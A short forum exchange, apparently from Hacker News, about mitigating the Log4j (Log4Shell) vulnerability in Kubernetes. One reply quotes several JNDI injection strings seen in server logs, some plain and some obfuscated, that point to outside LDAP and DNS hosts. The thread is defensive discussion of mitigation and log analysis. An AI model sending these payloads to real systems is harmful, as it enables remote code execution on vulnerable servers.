by azifali 1646 days ago
We have published a mitigation for K8s which could be applied by:

1. blocking outbound JNDI lookups through a network policy
2. blocking possible execs from the Java process:

https://blog.accuknox.com/log-4j-exploit-and-mitigation/


As I understand it, your policy blocks the LDAP port (389). All of the scanning I see in logs at the moment uses port 80: "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
The last ones I've seen:

jndi:dns://ip.address.scanworld.net/ref

jndi:ldap://162.55.90.26/222xxxx905/C

jndi:ldap://195.54.160.149:12344/Basic/Command/Base64...

jndi:ldap://45.130.229.168:1389/Exploit

{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64....

Surprisingly, very few attempts via HTTP calls, and while some are on default ports, most aren't.

I think the most obvious attack methods will have been closed. It's routes like the "naming a rogue AP" method that will be interesting.